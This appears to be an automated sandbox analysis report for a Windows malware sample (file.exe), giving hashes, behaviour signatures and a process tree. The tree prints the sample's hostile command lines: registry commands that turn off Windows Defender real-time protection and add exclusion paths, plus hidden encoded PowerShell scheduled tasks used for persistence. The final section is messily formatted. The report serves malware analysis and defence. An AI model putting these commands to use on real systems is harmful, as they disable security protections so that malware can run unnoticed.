Analysis

max time kernel: 130s
max time network: 132s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 21/12/2022, 22:47

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20221111-en

General

Target: file.exe
Size: 7.3MB
MD5: 97c57dba01e051aefa8cdca5f29d20cd
SHA1: 178fede4b249f7dbefb887003b8f36360a00ad0f
SHA256: 6e82fdf9791c3706dbe035d98bf1ca8fedb622386ca5e57c3aa41c35a2facdc7
SHA512: fb95cdbe21ac00c1b2f081c43baef3c34048a3c2ddc4c02e083ee8604e3f83b2f8acea482cceeb90a6987b67d2ab80c4c53c6cac8f1a45ca7dfd30c2cdaf1c52
SSDEEP: 196608:91OhtoK/KIBI3lyJbVf4c5X1j6IjA8xc6n1tYwaikgWaN:3OhtzKvs1FjDc2HLaik4
Malware Config
Signatures

Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Windows security bypass
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" | reg.exe
Blocklisted process makes network request (1 IoC)
flow | pid | Process
21 | 864 | rundll32.exe
Executes dropped EXE (4 IoCs)
pid | Process
536 | Install.exe
620 | Install.exe
828 | EpdQepo.exe
996 | ZkSYWem.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation | ZkSYWem.exe
Loads dropped DLL (12 IoCs)
pid | Process
1764 | file.exe
536 | Install.exe (4 entries)
620 | Install.exe (3 entries)
864 | rundll32.exe (4 entries)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension (1 IoC)
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | ZkSYWem.exe
Drops file in System32 directory (19 IoCs)
description | ioc | Process
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | EpdQepo.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | EpdQepo.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | EpdQepo.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | ZkSYWem.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE (4 entries)
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | ZkSYWem.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | ZkSYWem.exe
Drops file in Program Files directory (13 IoCs)
description | ioc | Process
File created | C:\Program Files (x86)\LJVhNoouCIYvC\uuDAhrc.xml | ZkSYWem.exe
File created | C:\Program Files (x86)\LJVhNoouCIYvC\sBCGKyo.dll | ZkSYWem.exe
File created | C:\Program Files (x86)\fFIwvsLyPfUn\jaEFinx.dll | ZkSYWem.exe
File created | C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\dphLCVD.dll | ZkSYWem.exe
File created | C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\QoRJesY.xml | ZkSYWem.exe
File created | C:\Program Files (x86)\xPPqLUFFU\ofiZBaU.xml | ZkSYWem.exe
File created | C:\Program Files (x86)\xPPqLUFFU\FGlSXg.dll | ZkSYWem.exe
File created | C:\Program Files (x86)\nNTpTrwDNnPU2\VFuGUlrSxXUgN.dll | ZkSYWem.exe
File created | C:\Program Files (x86)\nNTpTrwDNnPU2\vwWmtWz.xml | ZkSYWem.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | ZkSYWem.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | ZkSYWem.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | ZkSYWem.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | ZkSYWem.exe
Drops file in Windows directory (4 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\bcmBoHFysFBidtSprQ.job | schtasks.exe
File created | C:\Windows\Tasks\yTojJpVlyxZWLIphK.job | schtasks.exe
File created | C:\Windows\Tasks\mvThVpxzbhgVRbG.job | schtasks.exe
File created | C:\Windows\Tasks\diAnMdtAazTJxxqKi.job | schtasks.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTP, 13 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1188, 1020, 1736, 452, 560, 1896, 1960, 2036, 1276, 1612, 1556, 1712, 700 | schtasks.exe (one entry per PID)
Enumerates system info in registry (2 TTPs, 4 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS (64 IoCs)
Suspicious behavior: EnumeratesProcesses (29 IoCs)
pid | Process
1664 | powershell.EXE (3 entries)
1372 | powershell.EXE (3 entries)
552 | powershell.EXE (3 entries)
1768 | powershell.EXE (3 entries)
996 | ZkSYWem.exe (17 entries)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1664 | powershell.EXE
Token: SeDebugPrivilege | 1372 | powershell.EXE
Token: SeDebugPrivilege | 552 | powershell.EXE
Token: SeDebugPrivilege | 1768 | powershell.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
Processes

C:\Users\Admin\AppData\Local\Temp\file.exe (PID: 1764)
  Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\7zSFC2B.tmp\Install.exe (PID: 536)
    Command line: .\Install.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\7zS2.tmp\Install.exe (PID: 620)
      Command line: .\Install.exe /S /site_id "525403"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Loads dropped DLL
      - Drops file in System32 directory
      - Enumerates system info in registry
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\forfiles.exe (PID: 1656)
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe (PID: 1556)
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory

          \??\c:\windows\SysWOW64\reg.exe (PID: 1572)
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

          \??\c:\windows\SysWOW64\reg.exe (PID: 1632)
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

      C:\Windows\SysWOW64\forfiles.exe (PID: 1856)
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe (PID: 1072)
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory

          \??\c:\windows\SysWOW64\reg.exe (PID: 1972)
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

          \??\c:\windows\SysWOW64\reg.exe (PID: 2036)
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

      C:\Windows\SysWOW64\schtasks.exe (PID: 1712)
        Command line: schtasks /CREATE /TN "gDFWPgSfs" /SC once /ST 14:50:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)

      C:\Windows\SysWOW64\schtasks.exe (PID: 840)
        Command line: schtasks /run /I /tn "gDFWPgSfs"

      C:\Windows\SysWOW64\schtasks.exe (PID: 1464)
        Command line: schtasks /DELETE /F /TN "gDFWPgSfs"

      C:\Windows\SysWOW64\schtasks.exe (PID: 700)
        Command line: schtasks /CREATE /TN "bcmBoHFysFBidtSprQ" /SC once /ST 23:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\EpdQepo.exe\" RP /site_id 525403 /S" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)

C:\Windows\system32\taskeng.exe (PID: 952)
  Command line: taskeng.exe {3754D45B-221C-4BFE-8BD5-813D98E3D5EE} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID: 1664)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\gpupdate.exe (PID: 1952)
      Command line: "C:\Windows\system32\gpupdate.exe" /force

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID: 1372)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\gpupdate.exe (PID: 760)
      Command line: "C:\Windows\system32\gpupdate.exe" /force

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID: 552)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\gpupdate.exe (PID: 1148)
      Command line: "C:\Windows\system32\gpupdate.exe" /force

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID: 1768)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\gpupdate.exe (PID: 1612)
      Command line: "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe (PID: 1396)
  Command line: gpscript.exe /RefreshSystemParam

C:\Windows\system32\taskeng.exe (PID: 1672)
  Command line: taskeng.exe {5F1FD4AF-6ECD-4727-A09C-CD93005F9CBD} S-1-5-18:NT AUTHORITY\System:Service:

  C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\EpdQepo.exe (PID: 828)
    Command line: C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr\AFzekPlfQCDUbED\EpdQepo.exe RP /site_id 525403 /S
    - Executes dropped EXE
    - Drops file in System32 directory

    C:\Windows\SysWOW64\schtasks.exe (PID: 1896)
      Command line: schtasks /CREATE /TN "gEUgMxECk" /SC once /ST 00:21:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe (PID: 968)
      Command line: schtasks /run /I /tn "gEUgMxECk"

    C:\Windows\SysWOW64\schtasks.exe (PID: 1188)
      Command line: schtasks /DELETE /F /TN "gEUgMxECk"

    C:\Windows\SysWOW64\cmd.exe (PID: 1952)
      Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

      C:\Windows\SysWOW64\reg.exe (PID: 1476)
        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        - Modifies Windows Defender Real-time Protection settings

    C:\Windows\SysWOW64\cmd.exe (PID: 1804)
      Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

      C:\Windows\SysWOW64\reg.exe (PID: 2008)
        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        - Modifies Windows Defender Real-time Protection settings

    C:\Windows\SysWOW64\schtasks.exe (PID: 452)
      Command line: schtasks /CREATE /TN "gtJenuXVE" /SC once /ST 22:59:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe (PID: 996)
      Command line: schtasks /run /I /tn "gtJenuXVE"

    C:\Windows\SysWOW64\schtasks.exe (PID: 788)
      Command line: schtasks /DELETE /F /TN "gtJenuXVE"

    C:\Windows\SysWOW64\cmd.exe (PID: 1528)
      Command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:32

      C:\Windows\SysWOW64\reg.exe (PID: 948)
        Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass

    C:\Windows\SysWOW64\cmd.exe (PID: 692)
      Command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:64

      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:64
- Windows security bypass
PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:323⤵PID:2000
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:643⤵PID:588
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dZAkCesbbUKSZxso\ZBTpDgaj\zLKKJdLFZdZAaCXq.wsf"3⤵PID:700
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dZAkCesbbUKSZxso\ZBTpDgaj\zLKKJdLFZdZAaCXq.wsf"3⤵
- Modifies data under HKEY_USERS
PID:452 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1964
-
-
